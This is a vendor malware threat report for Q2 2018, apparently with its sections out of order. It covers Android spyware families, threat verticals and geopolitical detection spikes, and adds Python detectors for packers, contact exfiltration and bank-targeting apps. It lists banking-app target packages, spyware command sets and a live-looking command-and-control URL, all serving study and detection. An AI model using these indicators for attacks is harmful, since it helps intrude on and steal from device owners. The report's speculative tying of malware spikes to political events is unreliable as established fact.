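        elif shannon_entropy(data) > entropy_limit:
            high_entropy.append(name)     # looks compressed or encrypted
    upx_named = any(n.upper().startswith("UPX") for n in names)
    return {
        "sections": names,
        "upx_named": upx_named,
        "empty_large_sections": empty_large,
        "high_entropy_sections": high_entropy,
        "likely_packed": upx_named or bool(empty_large and high_entropy),
    }


def build_pe(sections) -> bytes:
    """Assemble a minimal PE (no optional header) from (name, vsize, raw) tuples."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    ptr = e_lfanew + 4 + 20 + 40 * len(sections)  # raw data starts after the table
    headers, blobs = [], []
    for i, (name, vsize, raw) in enumerate(sections):
        headers.append(struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                                   vsize, 0x1000 * (i + 1), len(raw),
                                   ptr if raw else 0, 0, 0, 0, 0, 0x60000020))
        blobs.append(raw)
        ptr += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + b"".join(headers) + b"".join(blobs)


# Constructed samples: a UPX-style layout with pseudo-random "compressed" data,
# and a plain layout whose code section is low-entropy filler.
_rng = random.Random(2018)
COMPRESSED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_CODE = b"\x90" * 2000 + b"MessageBoxA\0" * 100
PACKED_PE = build_pe([("UPX0", 0x8000, b""), ("UPX1", 0x1000, COMPRESSED_BLOB),
                      (".rsrc", 0x200, b"\0" * 512)])
UNPACKED_PE = build_pe([(".text", 0x1000, PLAIN_CODE), (".data", 0x200, b"\0" * 256)])

if __name__ == "__main__":
    print("packed  :", packer_indicators(PACKED_PE))
    print("unpacked:", packer_indicators(UNPACKED_PE))
```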


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

Two conclusions follow. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: the contacts, id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, http://cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect the browser's data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of the previous versions, it includes some additional tricks:

• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls
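As an added example (not code from the Comodo report), the following detector shows how a defender can spot the Base64-wrapped contact exfiltration that the first Zoo Park version performs when it appears in captured HTTP request bodies: it pulls out Base64-looking tokens, decodes the valid ones and scores the plaintext by the phone numbers and e-mail addresses it carries. The three captured bodies, the hostnames and the leak threshold are constructed assumptions.

```python
"""Spotting Base64-wrapped contact-list exfiltration in captured POST bodies.

Added example, not code from the Comodo report. Zoo Park's first version is
described as Base64-encoding account and contact details before sending
them to the attackers' server. This detector takes captured request bodies,
extracts Base64-looking tokens, decodes the ones that are valid and scores
the plaintext by the phone numbers and e-mail addresses it carries.
The request bodies, hosts and threshold below are constructed assumptions.
"""
import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long enough to be payload, not a nonce
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{7,}\d")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def decode_candidates(body: str):
    """Yield the UTF-8 plaintext of every valid Base64 token in the body."""
    for m in B64_TOKEN.finditer(body):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            yield raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue      # random tokens and binary blobs are not contact text


def score_body(body: str, threshold: int = 3) -> dict:
    """Count contact-like fields in decoded tokens and flag a probable leak."""
    phones = emails = 0
    for text in decode_candidates(body):
        phones += len(PHONE_RE.findall(text))
        emails += len(EMAIL_RE.findall(text))
    return {"phones": phones, "emails": emails,
            "contacts_leak": phones + emails >= threshold}


def triage(requests) -> list:
    """Return the indices of captured (host, body) pairs that look like a leak."""
    return [i for i, (_host, body) in enumerate(requests)
            if score_body(body)["contacts_leak"]]


# Constructed contact dump of the kind an infected device would post.
CONTACTS = ("name=Alice;phone=+1 555 0100;mail=alice@example.com\n"
            "name=Bob;phone=+1 555 0101;mail=bob@example.net\n")

# Constructed captures: an ordinary session cookie, a plain search, and the
# contact dump posted to an unknown host.
CAPTURED = [
    ("api.example.org", "user=alice&session=" +
     base64.b64encode(b"session:8f2a;role:viewer").decode()),
    ("cdn.example.org", "q=weather+helsinki"),
    ("198.51.100.23", "id=1&data=" + base64.b64encode(CONTACTS.encode()).decode()),
]

if __name__ == "__main__":
    for i in triage(CAPTURED):
        host, body = CAPTURED[i]
        print("possible contact exfiltration to", host, score_body(body))
```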

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control of the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set the ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable the Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App distribution (names under which Stalker Spy is distributed):

FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید (Spy Hide tracker), Keylogger, System Service, Mobile Spy, 随意代挂 (game idling service), Subway Surfers, 라이브성인방송 (live adult broadcast), Мобильный антивирус (Mobile Antivirus), droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배 (CJ Logistics parcel delivery), 余生代挂APP (game idling app), Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент (mobile client), Asa刷钻 (Asa gem farming)

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a 007 licence.

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:


Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send USSD data to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather information about installed applications

Send_call: set the Intent action to place a call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injector (overlay) class

4.1.7 FakeSpy

FakeSpy also has many masks, as shown in the screenshot.

佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)

Disguises of FakeSpy

It collects the available information from the infected device and sends it to the C&C servers. It also checks for the following applications: aucomapp, softbankcomapp, docomocomapp.

Here are some of the commands from its Command and Control server:

contacts: get contact details and email ID

Mute: set the ringer to mute

Mms: get MMS content

info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to win users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp and Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device for the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can also block access to some applications and sites, including Google Chrome, the Google Play Store, Gmail and YouTube.
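The bank-hunting behaviour described for Xloader (4.1.4), FakeSpy (4.1.7) and RedAlert (4.1.8) leaves a static footprint in the APK: a list of target package names in the dex string table, PackageManager calls that enumerate what is installed, and SMS permissions to catch one-time passcodes. The following Python script is an added example written for this edition, not code from the report or from any of the malware families; it scores an APK from its manifest permissions and dex strings. The dotted package names are this example's reading of the identifiers the report prints with the dots stripped, the weights and thresholds are arbitrary choices, and the two sample inputs are constructed.

```python
"""Static triage heuristic for Android samples that hunt for banking apps.

Inputs are what a triage pipeline already has for an APK: the permission
list from AndroidManifest.xml and the string table of classes.dex (as
produced by apktool or androguard; neither is called here, so the script
runs offline on constructed data).
"""
import re

# Dotted forms of the package identifiers the report prints for Xloader
# (Korean banks) and RedAlert (Postbank, mBank, AIB).  Assumption: the
# report's text extraction dropped the dots.  Extend from your own intel.
BANK_PACKAGES = {
    "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
    "com.sc.danb.scbankapp", "com.shinhan.sbanking",
    "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
    "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    "de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android",
}

# Permissions behind the capabilities the report lists (SMS theft, contact
# harvesting, call control, overlays), each mapped to why it matters.
RISKY_PERMISSIONS = {
    "android.permission.READ_SMS": "read stored SMS (OTP theft)",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SEND_SMS": "send SMS (spam, premium numbers)",
    "android.permission.READ_CONTACTS": "harvest contacts",
    "android.permission.RECORD_AUDIO": "record the microphone",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw overlays over other apps",
    "android.permission.CALL_PHONE": "place calls",
    "android.permission.PROCESS_OUTGOING_CALLS": "monitor or redirect calls",
}

# PackageManager calls that show up in the dex string table when code
# enumerates installed apps to pick a bank to impersonate.
ENUM_API_MARKERS = ("getInstalledPackages", "getInstalledApplications", "getPackageInfo")

PACKAGE_RE = re.compile(r"^[a-z][a-z0-9_]*(\.[a-z][a-z0-9_]*)+$")


def triage(permissions, dex_strings, bank_hits_threshold=3):
    """Score an APK from its permissions and dex strings; return a verdict dict."""
    perms = set(permissions)
    candidate_pkgs = {s for s in dex_strings if PACKAGE_RE.match(s)}
    bank_hits = sorted(candidate_pkgs & BANK_PACKAGES)
    enumerates = any(m in s for s in dex_strings for m in ENUM_API_MARKERS)
    risky = {p: why for p, why in RISKY_PERMISSIONS.items() if p in perms}

    score, reasons = 0, []
    # A bank app references its own package; a banker references many.
    if len(bank_hits) >= bank_hits_threshold:
        score += 50
        reasons.append(f"references {len(bank_hits)} banking packages")
    elif bank_hits:
        score += 20
        reasons.append(f"references banking package {bank_hits[0]}")
    if bank_hits and enumerates:
        score += 20
        reasons.append("enumerates installed packages (target selection)")
    score += 5 * len(risky)
    reasons.extend(f"{p.rsplit('.', 1)[-1]}: {why}" for p, why in risky.items())
    # Bank targeting combined with SMS access is the OTP-interception pattern.
    if bank_hits and perms & {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"}:
        score += 15
        reasons.append("bank targeting plus SMS access (OTP interception)")

    verdict = "malicious" if score >= 70 else "suspicious" if score >= 30 else "clean"
    return {"score": score, "verdict": verdict, "bank_hits": bank_hits, "reasons": reasons}


# Constructed sample inputs (not real extraction output).
XLOADER_LIKE_PERMS = [
    "android.permission.INTERNET", "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS",
    "android.permission.READ_CONTACTS", "android.permission.CALL_PHONE",
    "android.permission.CHANGE_WIFI_STATE",
]
XLOADER_LIKE_STRINGS = [
    "Landroid/content/pm/PackageManager;", "getInstalledPackages",
    "com.wooribank.pib.smart", "com.kbstar.kbbank", "nh.smart",
    "sendTextMessage", "content://sms/inbox", "http://example.invalid/gate.php",
]
FLASHLIGHT_PERMS = ["android.permission.CAMERA", "android.permission.INTERNET"]
FLASHLIGHT_STRINGS = ["android.hardware.camera.flash", "com.example.flashlight"]

if __name__ == "__main__":
    for name, p, s in (("xloader-like", XLOADER_LIKE_PERMS, XLOADER_LIKE_STRINGS),
                       ("flashlight", FLASHLIGHT_PERMS, FLASHLIGHT_STRINGS)):
        r = triage(p, s)
        print(f"{name}: {r['verdict']} (score {r['score']})")
        for reason in r["reasons"]:
            print("  -", reason)
```

A legitimate bank app references only its own package, so a single hit scores low; three or more references combined with package enumeration and SMS access is the overlay-plus-OTP-interception pattern the report describes, and that combination is what pushes the constructed sample to "malicious".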

4.1.9 Hero Rat

The next digital spook, Hero Rat, operates mostly on Iranian territory. It uses third-party app stores, social networks and messengers to spread.

Version 1: CloudVPN, MyIrancel, Mtproto, زیبانویس (decorative-font writer), تلگرام ھمھ کاره (all-in-one Telegram), Proxy, دوست یاب (friend finder), Telegram Ton, شارژ رایگان بگیر (get free credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (unlimited follower getter), اینترنت رایگان (free Internet)

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It reaches victims in the variety of disguises named above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it into the victims' machines. What she does not know is that another cybercriminal had earlier infected that CoinMiner build with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story illustrates the situation in cybersecurity in Q2: no one can feel totally secure, and even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below are detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

(Chart: Android-targeted malware detections in April)

4.2.2 May 2018

(Chart: Android-targeted malware detections in May; the y-axes of the April and May charts run from 0 to 180,000 and from 0 to 500,000 detections)


4.2.3 June 2018

(Chart: Android-targeted malware detections in June; y-axis from 0 to 300,000 detections)


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and to understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network-reachable software as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network; even a worm without a payload, however, can consume enormous bandwidth, diminish network or local system resources and cause a denial of service. For this Q2 2018 report we place worms in a special "Strategic Threat" category because of their ability to travel very quickly across the Internet and compromise many computers at once.


